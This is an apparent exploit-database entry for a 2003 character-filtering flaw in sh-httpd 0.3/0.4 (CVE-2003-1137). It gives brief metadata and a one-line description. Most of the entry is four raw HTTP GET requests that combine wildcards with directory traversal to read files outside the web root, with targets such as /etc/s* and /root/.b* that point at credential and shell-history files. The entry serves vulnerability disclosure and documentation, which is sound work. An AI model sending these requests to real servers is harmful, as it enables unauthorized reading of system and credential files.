SH-HTTPD 0.3/0.4 - Character Filtering Remote Information Disclosure

Author: dong-h0un U
type: remote
platform: linux
port: 
date_added: 2003-10-27 
date_updated: 2012-12-11 
verified: 1 
codes: CVE-2003-1137;OSVDB-2721 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/8897/info

A problem has been identified in the handling of some characters by sh-httpd. Because of this, an attacker may be able to gain unauthorized access to information.


GET *
GET ../../../sh-httpd/p*
GET /../../etc/s*
GET ../../root/.b*